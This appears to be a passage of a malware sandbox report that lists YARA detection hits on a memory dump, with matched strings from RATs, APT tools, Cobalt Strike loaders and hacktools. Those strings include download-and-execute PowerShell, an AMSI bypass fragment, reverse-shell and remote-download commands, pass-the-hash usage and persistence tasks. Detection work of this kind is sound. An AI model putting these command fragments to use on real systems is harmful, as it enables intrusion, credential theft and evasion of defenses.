0x1861a:$s7: hackqz.f3322.org:8880
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x2baf:$s1: .CreateObject("WScript.Shell") 0x1a4cf:$s1: .CreateObject("WScript.Shell") 0x1a673:$s1: .CreateObject("WScript.Shell") 0x3d98:$p1: powershell.exe 0x3dbf:$p1: powershell.exe 0x3f66:$p1: powershell.exe 0x3fa3:$p1: powershell.exe 0x5747:$p1: powershell.exe 0xd118:$p1: powershell.exe 0xd273:$p1: powershell.exe 0xd2b1:$p1: powershell.exe 0x10376:$p1: powershell.exe 0x13456:$p1: powershell.exe 0x38dd2:$p1: powershell.exe 0x3b7dc:$p1: powershell.exe 0x3bc38:$p1: powershell.exe 0x3c620:$p1: powershell.exe 0x3cb19:$p1: powershell.exe 0x3df32:$p1: powershell.exe 0x950:$p3: [System.Convert]::FromBase64String( 0x3d189:$p3: [System.Convert]::FromBase64String(
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	HTA_with_WScript_Shell	Detects WScript Shell in HTA	Florian Roth	0x15f6a:$s1: <hta:application windowstate="minimize"/> 0x160fb:$s1: <hta:application windowstate="minimize"/> 0x15f98:$s2: <script>var b=new ActiveXObject("WScript.Shell");
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	HTA_Embedded	Detects an embedded HTA file	Florian Roth	0x15f6a:$s1: <hta:application windowstate="minimize"/> 0x160fb:$s1: <hta:application windowstate="minimize"/>
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	StoneDrill	Detects malware from StoneDrill threat report	Florian Roth	0x3a987:$s1: Hello dear 0x3a996:$s2: WRZRZRAR 0x3a9a5:$opa1: 66 89 45 D8 6A 64 FF 0x3a9b3:$opa2: 8D 73 01 90 0F BF 51 FE
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	StoneDrill_VBS_1	Detects malware from StoneDrill threat report	Florian Roth	0x3ab38:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros 0x3abb6:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul 0x3abdb:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\ 0x3ac0b:$s2: WshShell.DeleteFile "%temp%\ 0x3ac2c:$s3: WScript.Sleep(10 * 1000) 0x3ac49:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists(" 0x3aca3:$s5: , "%COMMON_APPDATA%\Chrome\
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x1160e:$x1: zxplug -add 0x1161e:$x2: getxxx c:\xyz.dll 0x11634:$x3: downfile -d c:\windows\update.exe 0x1165a:$x4: -fromurl http://x.x.x/x.dll 0x1167a:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s 0x116aa:$x6: ZXNC -e cmd.exe x.x.x.x 0x116c6:$x7: (bind a cmdshell) 0x116dc:$x8: ZXFtpServer 21 20 zx 0x116f5:$x9: ZXHttpServer 0x11707:$x10: c:\error.htm,.exe\|c:\a.exe,.zip\|c:\b.zip" 0x11736:$x11: c:\windows\clipboardlog.txt 0x11757:$x12: AntiSniff -a wireshark.exe 0x11777:$x13: c:\windows\keylog.txt
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EternalRocks_taskhost	Detects EternalRocks Malware - file taskhost.exe	Florian Roth	0x19b25:$s1: sTargetIP 0x19b33:$s2: SERVER_2008R2_SP0 0x19b49:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51 0x19b76:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	BeyondExec_RemoteAccess_Tool	Detects BeyondExec Remote Access Tool - file rexesvr.exe	Florian Roth	0x38f6a:$x1: \BeyondExecV2\Server\Release\Pipes.pdb 0x38f95:$x2: \\.\pipe\beyondexec%d-stdin 0x38fb5:$x3: Failed to create dispatch pipe. Do you have another instance running? 0x39000:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40 0x39016:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Disclosed_0day_POCs_injector	Detects POC code from disclosed 0day hacktool set	Florian Roth	0x12926:$x1: \Release\injector.pdb 0x12940:$x2: Cannot write the shellcode in the process memory, error: 0x1297e:$x3: /s shellcode_file PID: shellcode injection. 0x129ae:$x4: /d dll_file PID: dll injection via LoadLibrary(). 0x1297e:$x5: /s shellcode_file PID 0x129e4:$x5: /s shellcode_file PID 0x129fe:$x6: Shellcode copied in memory: OK 0x12a21:$x7: Usage of the injector. 0x12a3d:$x8: KO: cannot obtain the SeDebug privilege.
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0xa146:$x1: reflective_inject_dll 0xa1c7:$x1: reflective_inject_dll 0xa1e1:$x1: reflective_inject_dll 0x3b960:$x1: reflective_inject_dll 0x3b97a:$x2: ImportError: pupy builtin module not found ! 0x3b9ab:$x3: please start pupy from either it's exe stub or it's reflective DLLR; 0xa19a:$x4: [INJECT] inject_dll. 0x3b9f4:$x4: [INJECT] inject_dll. 0x3ba0d:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS')) 0x3ba74:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OilRig_Strings_Oct17	Detects strings from OilRig malware and malicious scripts	Florian Roth	0x6b9:$x1: %localappdata%\srvHealth.exe 0x6da:$x2: %localappdata%\srvBS.txt 0x6f7:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb 0x736:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb 0x777:$s3: .LoadDll("Run", arg, "C:\\Windows\\
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Suspicious_Script_Running_from_HTTP	Detects a suspicious	Florian Roth	0x9211:$s1: cmd /C script:http:// 0x922b:$s2: cmd /C script:https:// 0x9246:$s3: cmd.exe /C script:http:// 0x9264:$s4: cmd.exe /C script:https://
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x906:$s5: TVqQAAMAAAAEAA 0xf74b:$s5: TVqQAAMAAAAEAA 0x3fd7:$a1: = CreateObject("Wscript.Shell") 0x3d725:$a1: = CreateObject("Wscript.Shell") 0x3df7d:$a1: = CreateObject("Wscript.Shell")
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_1	Detects Industroyer related malware	Florian Roth	0x170d5:$s1: haslo.exe 0x17136:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ... 0x17182:$x2: haslo.datCrash
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Portscan_3_Output	Detects Industroyer related custom port scaner output file	Florian Roth	0x16f5b:$s1: WSA library load complite. 0x16f7a:$s2: Connection refused
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_4	Detects Industroyer related malware	Florian Roth	0x17812:$s2: defragsvc 0x17820:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Industroyer_Malware_5	Detects Industroyer related malware	Florian Roth	0x1796f:$x1: D2MultiCommService.exe 0x1798a:$x2: Crash104.dll 0x1799b:$x3: iec104.log 0x179aa:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x179d7:$s1: Error while getaddrinfo executing: %d 0x17a01:$s2: return info-Remote command 0x17a20:$s3: Error killing process ... 0x17a3e:$s4: stop_comm_service_name 0x17a59:$s5: 1 Data exchange: Send: %d (%s)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	redSails_PY	Detects Red Sails Hacktool - Python	Florian Roth	0x3b6d:$x1: Gained command shell on host 0x3b8e:$x2: [!] Received an ERROR in shell() 0x3bb3:$x3: Target IP address with backdoor installed 0x3be1:$x4: Open backdoor port on target machine 0x3c0a:$x5: Backdoor port to open on victim machine
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Rehashed_RAT_2	Detects malware from Rehashed RAT incident	Florian Roth	0x747f:$x1: dalat.dulichovietnam.net 0x749c:$x2: web.Thoitietvietnam.org 0x74b8:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64) 0x7502:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3 0x7587:$s1: GET /%s%s%s%s HTTP/1.1 0x75a2:$s2: http://%s:%d/%s%s%s%s 0x75bc:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Malware_QA_vqgk	VT Research QA uploaded malware - file vqgk.dll	Florian Roth	0xea16:$x3: %d is an x86 process (can't inject x64 content) 0x17f91:$x3: %d is an x86 process (can't inject x64 content) 0xe9e0:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17f5b:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17fc5:$s2: Could not open process token: %d (%u) 0xeac5:$s5: Failed to impersonate logged on user %d (%u) 0xea4a:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x17f0d:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x36:$s7: could not write to process memory: %d 0xea98:$s9: Failed to impersonate token from %d (%u)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xa08d:$x1: reflectively inject a dll into a process. 0xa0bb:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid 0xa0fc:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null 0xa146:$x4: reflective_inject_dll 0xa1c7:$x4: reflective_inject_dll 0xa1e1:$x4: reflective_inject_dll 0x3b960:$x4: reflective_inject_dll 0xa0bb:$x5: ld_preload_inject_dll 0xa160:$x5: ld_preload_inject_dll 0xa17a:$x6: get_pupy_config() -> string 0xa19a:$x7: [INJECT] inject_dll. OpenProcess failed. 0xa146:$x8: reflective_inject_dll 0xa1c7:$x8: reflective_inject_dll 0xa1e1:$x8: reflective_inject_dll 0x3b960:$x8: reflective_inject_dll 0xa1e1:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0xa224:$x10: linux_inject_main
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Microcin_Sample_5	Malware sample mentioned in Microcin technical report by Kaspersky	Florian Roth	0x502e:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary 0x507a:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option> 0x50b9:$x3: The password is "%s" Time: %d(s) 0x50e6:$x4: The password is " %s " Time: %d(s) 0x5115:$x5: No password found! 0x512c:$x7: Can not found the Password Dictoonary file!
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x1942d:$x1: \ClearLog\Release\logC.pdb 0x19472:$s2: logC.dll 0x1949b:$s5: Logger Name:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xf21c:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JS_Suspicious_Obfuscation_Dropbox	Detects PowerShell AMSI Bypass	Florian Roth	0xf3e7:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t" 0xf412:$x2: script:https://www.dropbox.com
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JS_Suspicious_MSHTA_Bypass	Detects MSHTA Bypass	Florian Roth	0x7e06:$s1: mshtml,RunHTMLApplication 0xf58b:$s1: mshtml,RunHTMLApplication 0xf5a9:$s2: new ActiveXObject("WScript.Shell").Run( 0xf5d5:$s3: /c start mshta j
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JavaScript_Run_Suspicious	Detects a suspicious Javascript Run command	Florian Roth	0x8e2e:$s1: w = new ActiveXObject( 0x8e49:$s2: w.Run(r);
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x2cf62:$s2: Auditcleaner 0x2cfc9:$s2: Auditcleaner 0x3276e:$s11: elatedmonkey 0x327e2:$s11: elatedmonkey 0x2d578:$s17: ys.ratload.sh 0x2bccd:$elf4: charm_saver 0x2f51d:$elf8: ebbshave 0x2f585:$elf8: ebbshave 0x2f7bb:$elf9: eggbasket 0x2f824:$elf9: eggbasket 0x31a3c:$elf12: envoytomato 0x31aa2:$elf12: envoytomato 0x31827:$elf14: estopmoonlit 0x3188e:$elf14: estopmoonlit 0x33089:$elf17: ghost_sparc 0x33106:$elf17: ghost_sparc 0x30e1e:$elf18: jackpop 0x30e85:$elf18: jackpop 0x2a8c4:$elf19: orleans_stride 0x2ae50:$elf21: seconddate 0x2bccd:$pe2: charm_saver
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload_Spring1	Ysoserial Payloads - file Spring1.bin	Florian Roth	0x3ea43:$x1: ysoserial/Pwner
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload	Ysoserial Payloads	Florian Roth	0x3eb98:$x1: ysoserial/payloads/ 0x3ebb0:$s1: StubTransletPayload 0x3ebc8:$s2: Pwnrpw
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Ysoserial_Payload_3	Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin	Florian Roth	0x3ed4d:$x1: ysoserialq 0x3ed5c:$s1: targetClassInterceptorMetadatat 0x3ed80:$s2: targetInstancet 0x3ed94:$s3: targetClassL 0x3eda5:$s4: POST_ACTIVATEsr 0x3edb9:$s5: PRE_DESTROYsq
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	CACTUSTORCH	Detects CactusTorch Hacktool	Florian Roth	0xc84c:$x1: $payload = shellcode(%options["listener"], "true", "x86"); 0xc88b:$x2: Copy the base64 encoded payload into the code variable below. 0xc8ee:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 0xc94e:$x5: ' Author: Vincent Yiu (@vysecurity) 0xc976:$x6: Dim binary : binary = "rundll32.exe" 0xc99f:$a1: code = code & " 0xc9b3:$a2: serialized_obj = serialized_obj & " 0xc983:$s1: binary = "rundll32.exe" 0xc9db:$s1: binary = "rundll32.exe" 0xca4c:$s1: binary = "rundll32.exe" 0xc9f7:$s2: EL.DataType = "bin.hex" 0xca13:$s3: Set stm = CreateObject("System.IO.MemoryStream") 0xca48:$s4: var binary = "rundll32.exe"; 0xca69:$s5: var serialized_obj = "
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340c6:$s1: DoUploadAndExecute 0x340dd:$s2: DoDownloadAndExecute 0x340f6:$s3: DoShellExecute 0x34109:$s4: set_Processname 0x3411e:$op1: 04 1E FE 02 04 16 FE 01 60 0x3412d:$op2: 00 17 03 1F 20 17 19 15 28 0x3413c:$op3: 00 04 03 69 91 1B 40
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3428e:$x1: GetKeyloggerLogsResponse 0x342ab:$x2: get_Keylogger 0x342bd:$x3: HandleGetKeyloggerLogsResponse 0x342e0:$s1: DoShellExecuteResponse 0x342fb:$s2: GetPasswordsResponse 0x34314:$s3: GetStartupItemsResponse 0x34330:$s4: <GetGenReader>b__7 0x34347:$s5: RunHidden
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_2	Detects malware from Operation Cloud Hopper	Florian Roth	0x3713a:$x1: sERvEr.Dll 0x3715a:$x3: .?AVCKeyLoggerManager@@ 0x37176:$x4: GH0STCZH 0x371df:$s3: \Release\Loader.pdb 0x37266:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B 0x3727c:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9 0x37292:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_3	Detects malware from Operation Cloud Hopper	Florian Roth	0x37429:$s6: operator "" 0x37830:$s6: operator "" 0x38000:$s6: operator "" 0x36f5c:$s7: zok]\\\ZZYYY666564444 0x3743a:$s7: zok]\\\ZZYYY666564444 0x38033:$s7: zok]\\\ZZYYY666564444 0x3b347:$s7: zok]\\\ZZYYY666564444 0x37455:$s11: InvokeMainViaCRT 0x37841:$s11: InvokeMainViaCRT 0x3746b:$s12: .?AVAES@@ 0x37857:$s12: .?AVAES@@ 0x3747a:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32 0x37490:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03 0x374a6:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_Malware_5	Detects malware from Operation Cloud Hopper	Florian Roth	0x379e7:$x1: CWINDOWSSYSTEMROOT 0x379fe:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK 0x37a23:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY 0x37a43:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU 0x37a61:$s7: FALLINLOVE 0x37a71:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	OpCloudHopper_WmiDLL_inMemory	Malware related to Operation Cloud Hopper - Page 25	Florian Roth	0x35b31:$s1: wmi.dll 2>&1
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	VBS_WMIExec_Tool_Apr17_1	Tools related to Operation Cloud Hopper	Florian Roth	0x36c21:$x1: strNetUse = "cmd.exe /c net use \\" & host 0x36c50:$x2: localcmd = "cmd.exe /c " & command 0x36c78:$x3: & " > " & TempFile & " 2>&1" '2>&1 err 0x36ca4:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err 0x36cf1:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll" 0x36d39:$a1: WMIEXEC ERROR: Command -> 0x36d58:$a2: WMIEXEC : Command result will output to 0x36d84:$a3: WMIEXEC : Target -> 0x36d9c:$a4: WMIEXEC : Login -> OK 0x36db6:$a5: WMIEXEC : Process created. PID:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x790c:$x1: Nuclear Explosion.g.resources 0x795b:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41 0x7988:$x5: \RevengeRAT\ 0x7999:$x6: Revenge-RAT client has been successfully installed. 0x79d1:$x7: Nuclear Explosion.exe
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Mimipenguin_SH	Detects Mimipenguin Password Extractor - Linux	Florian Roth	0x386de:$s1: $(echo $thishash \| cut -d'$' -f 3) 0x38705:$s2: ps -eo pid,command \| sed -rn '/gnome\-keyring\-daemon/p' \| awk 0x38748:$s3: MimiPenguin Results:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	POSHSPY_Malware	Detects	Florian Roth	0xfbd6:$x1: function sWP($cN, $pN, $aK, $aI) 0xfbfb:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2 0xfc27:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len', 0xfc77:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA 0xfca2:$x5: $exeRes = exePldRoutine 0xfcbe:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0xf74b:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 0xf7c2:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	FIN7_Backdoor_Aug17	Detects Word Dropper from Proofpoint FIN7 Report	Florian Roth	0xb761:$x1: wscript.exe //b /e:jscript C:\Users\ 0xb78a:$x2: wscript.exe /b /e:jscript C:\Users\ 0xb7b2:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe 0xb7ff:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore 0xb839:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore 0xb872:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt 0xb8a1:$s1: /?page=wait 0xb8b1:$a1: autoit3.exe 0xb8c1:$a2: dumpcap.exe 0xb8d1:$a3: tshark.exe 0xb8e0:$a4: prl_cc.exe 0xb8ef:$v1: vmware 0xb8fa:$v2: PCI\\VEN_80EE&DEV_CAFE 0xb915:$v3: VMWVMCIHOSTDEV 0xb928:$c1: apowershell 0xb938:$c2: wpowershell 0xb948:$c3: get_passwords 0xb95a:$c4: kill_process 0xb96b:$c5: get_screen
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x15b6c:$s2: -t, --threads=N number of miner threads (default: number of processors)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_SMBExec	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0x164b5:$x1: Invoke-SMBExec -Target 0x164d0:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID 0x1653d:$s1: Write-Output "Command executed with service $SMB_service on $Target" 0x16586:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 0x165e9:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_WMIExec_Gen_1	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0x167a1:$x1: Invoke-WMIExec 0x167b5:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split)) 0x16825:$s1: Import-Module $PWD\Invoke-TheHash.ps1 0x1684f:$s2: Import-Module $PWD\Invoke-SMBClient.ps1 0x1687b:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList 0x168cf:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_SMBExec_Invoke_WMIExec_1	Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1	Florian Roth	0x16aad:$s1: $process_ID = $process_ID -replace "-00-00","" 0x16ae0:$s2: Write-Output "$Target did not respond" 0x16b0b:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_WMIExec_Gen	Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1	Florian Roth	0x16d06:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) 0x16d4b:$s2: $client_challenge = [String](1..8 \| ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 0x16db6:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") \| ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WMImplant	Auto-generated rule - file WMImplant.ps1	Florian Roth	0x38cfe:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential 0x38d32:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security') 0x38d9d:$x4: -Download -RemoteFile C:\passwords.txt 0x38dc8:$x5: -Command 'powershell.exe -command "Enable-PSRemoting 0x38e01:$x6: Invoke-WMImplant
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	FVEY_ShadowBrokers_Jan17_Screen_Strings	Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits	Florian Roth	0x21987:$x3: PeddleCheap 0x273f3:$x3: PeddleCheap 0x1fede:$d4: Mcl_NtMemory
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Invoke_OSiRis	Osiris Device Guard Bypass - file Invoke-OSiRis.ps1	Florian Roth	0x38892:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target 0x387b4:$x2: Invoke-OSiRis 0x38905:$x2: Invoke-OSiRis 0x38917:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username} 0x3895d:$x4: Device Guard Bypass Command Execution 0x38987:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath 0x38892:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create 0x389c7:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	MAL_KHRAT_script	Rule derived from KHRAT script but can match on other malicious scripts as well	Florian Roth	0x7d7e:$x1: CreateObject("WScript.Shell").Run "schtasks /create /sc MINUTE /tn 0x7dc5:$x2: CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 0x7e24:$x3: <registration progid="ff010f" classid="{e934870c-b429-4d0d-acf1-eef338b92c4b}" >
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WiltedTulip_powershell	Detects powershell script used in Operation Wilted Tulip	Florian Roth	0xd273:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WiltedTulip_Windows_UM_Task	Detects a Windows scheduled task as used in Operation Wilted Tulip	Florian Roth	0xdae4:$c1: svchost64.swp",checkUpdate 0xdb03:$c2: svchost64.swp,checkUpdate
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0xdcc1:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0xe9e0:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x17f5b:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0xea16:$x2: %d is an x86 process (can't inject x64 content) 0x17f91:$x2: %d is an x86 process (can't inject x64 content) 0xea4a:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x17f0d:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xea98:$x4: Failed to impersonate token from %d (%u) 0xeac5:$x5: Failed to impersonate logged on user %d (%u) 0x60:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xeaf6:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x17ffe:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
